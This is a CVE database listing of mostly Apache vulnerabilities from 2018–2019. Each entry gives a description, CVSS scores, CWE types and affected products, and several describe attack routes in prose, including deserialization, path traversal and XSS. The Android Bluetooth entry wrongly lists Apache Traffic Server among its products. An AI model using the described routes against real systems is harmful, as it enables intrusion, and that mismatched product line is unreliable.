CVE-2018-8035 MEDIUM

This vulnerability relates to the user's browser processing of DUCC webpage input data. The javascript comprising Apache UIMA DUCC (<= 2.2.2) which runs in the user's browser does not sufficiently filter user supplied inputs, which may result in unintended execution of user supplied javascript code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache uimaducc *
CVE-2018-8036 MEDIUM

In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache pdfbox 2.0.0
apache pdfbox *
CVE-2018-8037 MEDIUM

If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache tomcat *
debian debian_linux 9.0
apache tomcat 9.0.0
CVE-2018-8038 MEDIUM

Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf_fediz *
CVE-2018-8039 MEDIUM

It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache cxf *
redhat jboss_enterprise_application_platform 7.1.0
CVE-2018-8040 MEDIUM

Pages that are rendered using the ESI plugin can have access to the cookie header when the plugin is configured not to allow access. This affects Apache Traffic Server (ATS) versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8041 MEDIUM

Apache Camel's Mail 2.20.0 through 2.20.3, 2.21.0 through 2.21.1 and 2.22.0 is vulnerable to path traversal.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache camel 2.22.0
apache camel *
CVE-2018-8042 MEDIUM

In Apache Ambari versions 2.5.0 to 2.6.2, passwords for Hadoop credential stores are exposed in Ambari Agent informational log messages when the credential store feature is enabled for eligible services, for example Hive and Oozie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,

Products Affected

Vendor Product Version
apache ambari *
CVE-2018-9481

In bta_hd_set_report_act of bta_hd_act.cc, there is a possible out-of-bounds read due to an integer overflow. This could lead to remote information disclosure in the Bluetooth service with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.2 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 2.5 3.6

Products Affected

Vendor Product Version
google android 8.0
google android 8.1
google android 9.0
apache traffic_server *
CVE-2019-0186 MEDIUM

The input fields of the Apache Pluto "Chat Room" demo portlet 3.0.0 and 3.0.1 are vulnerable to Cross-Site Scripting (XSS) attacks. Mitigation: * Uninstall the ChatRoomDemo war file - or - * migrate to version 3.1.0 of the chat-room-demo war file

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pluto 3.0.0
apache pluto 3.0.1
CVE-2019-0187 HIGH

Unauthenticated RCE is possible when JMeter is used in distributed mode (-r or -R command line options). An attacker can establish an RMI connection to a jmeter-server using RemoteJMeterEngine and proceed with an attack using untrusted data deserialization. This only affects tests running in Distributed mode. Note that versions before 4.0 are not able to encrypt traffic between the nodes, nor authenticate the participating nodes, so an upgrade to JMeter 5.1 is also advised.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-327,CWE-502,

Products Affected

Vendor Product Version
apache jmeter 4.0
apache jmeter 5.0
CVE-2019-0188 MEDIUM

Apache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
oracle enterprise_data_quality 11.1.1.9.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle enterprise_repository 12.1.3.0.0
CVE-2019-0189 HIGH

The java.io.ObjectInputStream is known to cause Java serialisation issues. The issue here is exposed by the "webtools/control/httpService" URL, and uses Java deserialization to perform code execution. In the HttpEngine, the value of the request parameter "serviceContext" is passed to the "deserialize" method of "XmlSerializer". Apache OFBiz is affected via two different dependencies: "commons-beanutils" and an out-dated version of "commons-fileupload". Mitigation: Upgrade to 16.11.06 or manually apply the commits from OFBIZ-10770 and OFBIZ-10837 on branch 16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-0190 MEDIUM

A bug exists in the way mod_ssl handled client renegotiations. A remote attacker could send a carefully crafted request that would cause mod_ssl to enter a loop leading to a denial of service. This bug can be only triggered with Apache HTTP Server version 2.4.37 when using OpenSSL version 1.1.1 or later, due to an interaction in changes to handling of renegotiation attempts.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle retail_xstore_point_of_service 7.1
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle hospitality_guest_access 4.2.0
oracle hospitality_guest_access 4.2.1
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 7.0
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.37
CVE-2019-0191 MEDIUM

The Apache Karaf kar deployer reads .kar archives and extracts the paths from the "repository/" and "resources/" entries in the zip file. It then writes out the content of these paths to the Karaf repo and resources directories. However, it doesn't do any validation on the paths in the zip file. This means that a malicious user could craft a .kar file with ".." directory names and break out of the directories to write arbitrary content to the filesystem. This is the "Zip-slip" vulnerability - https://snyk.io/research/zip-slip-vulnerability. The impact of this vulnerability is low if the Karaf process user has limited permission on the filesystem. Any Apache Karaf release prior to 4.2.3 is impacted.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
CVE-2019-0192 HIGH

In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows the JMX server to be configured via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
netapp storage_automation_store -
apache solr *
CVE-2019-0193 HIGH

In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache solr *
debian debian_linux 8.0
CVE-2019-0194 MEDIUM

Apache Camel's File component is vulnerable to directory traversal. Camel 2.21.0 to 2.21.3, 2.22.0 to 2.22.2, 2.23.0 and the unsupported Camel 2.x (2.19 and earlier) versions may also be affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.23.0
CVE-2019-0195 HIGH

Manipulating classpath asset file URLs, an attacker could guess the path to a known file in the classpath and have it downloaded. If the attacker found the file with the value of the tapestry.hmac-passphrase configuration symbol, most probably the webapp's AppModule class, the value of this symbol could be used to craft a Java deserialization attack, thus running malicious injected Java code. The vector would be the t:formdata parameter from the Form component.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-0196 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.17 to 2.4.38. Using fuzzed network input, the http/2 request handling could be made to access freed memory in string comparison when determining the method of a request and thus process the request incorrectly.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
debian debian_linux 9.0
canonical ubuntu_linux 14.04
CVE-2019-0197 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.34 to 2.4.38. When HTTP/2 was enabled for a http: host or H2Upgrade was enabled for h2 on a https: host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. Server that never enabled the h2 protocol or that only enabled it for https: and did not set "H2Upgrade on" are unaffected by this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.2 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L 1.6 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
redhat jboss_core_services 1.0
oracle communications_session_report_manager 8.1.0
oracle enterprise_manager_ops_center 12.3.3
oracle communications_session_report_manager 8.2.0
oracle retail_xstore_point_of_service 7.1
oracle communications_session_route_manager 8.2.0
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 7.0
oracle http_server 12.2.1.3.0
opensuse leap 15.0
opensuse leap 42.3
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
oracle communications_session_route_manager 8.0.0
canonical ubuntu_linux 16.04
oracle communications_session_route_manager 8.1.0
fedoraproject fedora 30
oracle instantis_enterprisetrack 17.2
CVE-2019-0199 MEDIUM

The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0200 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J versions 6.0.0-7.0.6 (inclusive) and 7.1.0 which allows an unauthenticated attacker to crash the broker instance by sending specially crafted commands using AMQP protocol versions below 1.0 (AMQP 0-8, 0-9, 0-91 and 0-10). Users of Apache Qpid Broker-J versions 6.0.0-7.0.6 (inclusive) and 7.1.0 utilizing AMQP protocols 0-8, 0-9, 0-91, 0-10 must upgrade to Qpid Broker-J versions 7.0.7 or 7.1.1 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache qpid_broker-j *
apache qpid_broker-j 7.1.0
CVE-2019-0201 MEDIUM

An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper's getACL() command doesn't check any permission when retrieving the ACLs of the requested node and returns all information contained in the ACL Id field as a plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by a getACL() request for unauthenticated or unprivileged users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
oracle siebel_core_-_server_framework *
apache zookeeper 3.5.1
oracle timesten_in-memory_database *
debian debian_linux 9.0
oracle goldengate_stream_analytics *
apache zookeeper 3.5.2
debian debian_linux 8.0
netapp hci_bootstrap_os -
apache zookeeper 3.5.0
apache zookeeper *
apache zookeeper 3.5.4
redhat fuse 1.0.0
netapp element_software -
apache zookeeper 3.5.3
apache activemq 5.15.9
apache drill 1.16.0
CVE-2019-0202 MEDIUM

The Apache Storm Logviewer daemon exposes HTTP-accessible endpoints to read/search log files on hosts running Storm. In Apache Storm versions 0.9.1-incubating to 1.2.2, it is possible to read files off the host's file system that were not intended to be accessible via these endpoints.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-532,

Products Affected

Vendor Product Version
apache storm 0.9.2
apache storm 0.9.1
apache storm *
CVE-2019-0203 MEDIUM

In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion's svnserve server process may exit when a client sends certain sequences of protocol commands. This can lead to disruption for users of the server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-755,

Products Affected

Vendor Product Version
apache subversion 1.12.0
apache subversion *
CVE-2019-0204 HIGH

A specifically crafted Docker image running under the root user can overwrite the init helper binary of the container runtime and/or the command executor in Apache Mesos versions pre-1.4.x, 1.4.0 to 1.4.2, 1.5.0 to 1.5.2, 1.6.0 to 1.6.1, and 1.7.0 to 1.7.1. A malicious actor can therefore gain root-level code execution on the host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat fuse 7.5.0
apache mesos *
apache mesos 1.8.0
CVE-2019-0205 HIGH

In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when fed specific input data. Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache thrift *
redhat jboss_enterprise_application_platform 7.2.0
CVE-2019-0207 MEDIUM

Tapestry processes assets `/assets/ctx` using the class chain `StaticFilesFilter -> AssetDispatcher -> ContextResource`, which doesn't filter the character `\`, so an attacker can perform a path traversal attack to read any file on the Windows platform.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-0210 MEDIUM

In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when fed invalid input data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache thrift *
redhat jboss_enterprise_application_platform 7.2.0
CVE-2019-0211 HIGH

In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,

Products Affected

Vendor Product Version
redhat enterprise_linux_for_arm_64_eus 8.6_aarch64
canonical ubuntu_linux 18.10
redhat enterprise_linux_for_power_little_endian_eus 8.2_ppc64le
redhat enterprise_linux_for_power_little_endian_eus 8.4_ppc64le
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
redhat enterprise_linux_for_ibm_z_systems 8.0_s390x
redhat enterprise_linux_update_services_for_sap_solutions 8.1
redhat enterprise_linux_for_power_little_endian_eus 8.1_ppc64le
redhat jboss_core_services 1.0
fedoraproject fedora 28
redhat enterprise_linux_for_arm_64_eus 8.1_aarch64
oracle enterprise_manager_ops_center 12.3.3
redhat enterprise_linux_for_power_little_endian 8.0_ppc64le
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_server_tus 8.6
oracle retail_xstore_point_of_service 7.0
redhat enterprise_linux_server_tus 8.8
oracle http_server 12.2.1.3.0
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat enterprise_linux_for_arm_64_eus 8.4_aarch64
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_for_power_little_endian_eus 8.8_ppc64le
redhat openshift_container_platform_for_power 3.11_ppc64le
redhat enterprise_linux_for_ibm_z_systems_eus 8.4_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 8.2_s390x
oracle communications_session_route_manager 8.0.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
redhat enterprise_linux_update_services_for_sap_solutions 8.0
apache http_server *
oracle communications_session_route_manager 8.1.1
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_update_services_for_sap_solutions 8.6
oracle communications_session_report_manager 8.0.0
redhat enterprise_linux_eus 8.8
redhat enterprise_linux_update_services_for_sap_solutions 8.4
oracle communications_session_report_manager 8.1.0
oracle communications_session_report_manager 8.2.0
redhat enterprise_linux_for_arm_64 8.0_aarch64
redhat enterprise_linux_server_tus 8.4
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.8_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 8.1_s390x
oracle communications_session_route_manager 8.2.0
redhat enterprise_linux_for_power_little_endian_eus 8.6_ppc64le
fedoraproject fedora 29
redhat enterprise_linux_server_aus 8.6
opensuse leap 15.0
redhat enterprise_linux_for_arm_64_eus 8.8_aarch64
redhat enterprise_linux_update_services_for_sap_solutions 8.8
opensuse leap 42.3
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
oracle communications_session_route_manager 8.1.0
redhat enterprise_linux_for_arm_64_eus 8.2_aarch64
redhat enterprise_linux_for_ibm_z_systems_eus 8.6_s390x
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat software_collections 1.0
redhat openshift_container_platform 3.11
CVE-2019-0212 MEDIUM

In all previously released Apache HBase 2.x versions (2.0.0-2.0.4, 2.1.0-2.1.3), authorization was incorrectly applied to users of the HBase REST server. Requests sent to the HBase REST server were executed with the permissions of the REST server itself, not with the permissions of the end-user. This issue is only relevant when HBase is configured with Kerberos authentication, HBase authorization is enabled, and the REST server is configured with SPNEGO authentication. This issue does not extend beyond the HBase REST server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hbase *
CVE-2019-0213 MEDIUM

In Apache Archiva before 2.2.4, it may be possible to store malicious XSS code in central configuration entries, e.g. the logo URL. The vulnerability is considered a minor risk, as only users with the admin role can change the configuration; otherwise the communication between the browser and the Archiva server must be compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva *
CVE-2019-0214 MEDIUM

In Apache Archiva 2.0.0 - 2.2.3, it is possible to write files to the Archiva server at arbitrary locations by using the artifact upload mechanism. Existing files can be overwritten if the Archiva run user has appropriate permission on the filesystem for the target file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache archiva *
CVE-2019-0215 MEDIUM

In Apache HTTP Server 2.4 releases 2.4.37 and 2.4.38, a bug in mod_ssl when using per-location client certificate verification with TLSv1.3 allowed a client to bypass configured access control restrictions.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 30
fedoraproject fedora 29
apache http_server 2.4.37
apache http_server 2.4.38
CVE-2019-0216 LOW

A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-0217 MEDIUM

In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
fedoraproject fedora 28
netapp clustered_data_ontap -
oracle enterprise_manager_ops_center 12.3.3
canonical ubuntu_linux 12.04
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
redhat enterprise_linux_desktop 7.0
fedoraproject fedora 29
oracle retail_xstore_point_of_service 7.0
redhat enterprise_linux_workstation 7.0
oracle http_server 12.2.1.3.0
opensuse leap 15.0
netapp oncommand_unified_manager -
debian debian_linux 9.0
opensuse leap 42.3
oracle enterprise_manager_ops_center 12.4.0
debian debian_linux 8.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
redhat enterprise_linux -
redhat enterprise_linux_server 7.0
CVE-2019-0218 MEDIUM

A vulnerability was discovered wherein a specially crafted URL could enable reflected XSS via JavaScript in the Pony Mail interface.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pony_mail *
CVE-2019-0219 HIGH

A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle retail_xstore_point_of_service 16.0.6
oracle instantis_enterprisetrack 17.1
oracle retail_xstore_point_of_service 17.0.4
apache cordova_inappbrowser *
oracle instantis_enterprisetrack 17.2
oracle retail_xstore_point_of_service 18.0.3
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 19.0.2
CVE-2019-0220 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.0 to 2.4.38. When the path component of a request URL contains multiple consecutive slashes ('/'), directives such as LocationMatch and RewriteRule must account for duplicates in regular expressions, while other aspects of the server's processing will implicitly collapse them.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-706,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
opensuse leap 15.0
debian debian_linux 9.0
opensuse leap 42.3
fedoraproject fedora 28
debian debian_linux 8.0
canonical ubuntu_linux 16.04
canonical ubuntu_linux 14.04
fedoraproject fedora 30
fedoraproject fedora 29
CVE-2019-0221 MEDIUM

The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0222 MEDIUM

In Apache ActiveMQ 5.0.0 - 5.15.8, unmarshalling a corrupt MQTT frame can lead to a broker Out of Memory exception, making it unresponsive.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache activemq *
debian debian_linux 9.0
netapp e-series_santricity_web_services -
oracle enterprise_manager_base_platform 13.2.0.0.0
oracle communications_diameter_signaling_router 8.1
oracle goldengate_stream_analytics *
oracle enterprise_manager_base_platform 13.3.0.0.0
oracle enterprise_repository 12.1.3.0.0
oracle identity_manager_connector 9.0
oracle communications_diameter_signaling_router 8.2.1
oracle enterprise_manager_base_platform 12.1.0.5.0
oracle communications_diameter_signaling_router 8.0.0
oracle communications_diameter_signaling_router 8.2
CVE-2019-0223 MEDIUM

While investigating bug PROTON-2014, we discovered that under some circumstances Apache Qpid Proton versions 0.9 to 0.27.0 (C library and its language bindings) can connect to a peer anonymously using TLS *even when configured to verify the peer certificate* while used with OpenSSL versions before 1.1.0. This means that an undetected man in the middle attack could be constructed if an attacker can arrange to intercept TLS traffic.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_aus 6.4
redhat openstack 13
redhat enterprise_linux_eus 7.6
redhat enterprise_linux_eus 7.4
redhat satellite 6.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
redhat enterprise_linux_server_aus 7.3
redhat jboss_amq_clients_2 -
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_eus 7.5
apache qpid *
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 6.5
redhat satellite 6.3
redhat openstack 14
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.2
redhat satellite 6.5
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 6.6
redhat enterprise_linux_server 7.0
CVE-2019-0224 MEDIUM

In Apache JSPWiki 2.9.0 to 2.11.0.M2, a carefully crafted URL could execute javascript on another user's session. No information could be saved on the server or JSPWiki database, nor would an attacker be able to execute js on someone else's browser; only on their own browser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-0225 HIGH

A specially crafted URL could be used to access files under the ROOT directory of the application on Apache JSPWiki 2.9.0 to 2.11.0.M2, which could be used by an attacker to obtain registered users' details.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-0226 MEDIUM

The Apache Karaf Config service provides an install method (via service or MBean) that could be used to traverse into any directory and overwrite an existing file. The risk is low if the Karaf process user has limited permissions on the filesystem. Any Apache Karaf version before 4.2.5 is impacted. Users should upgrade to Apache Karaf 4.2.5 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
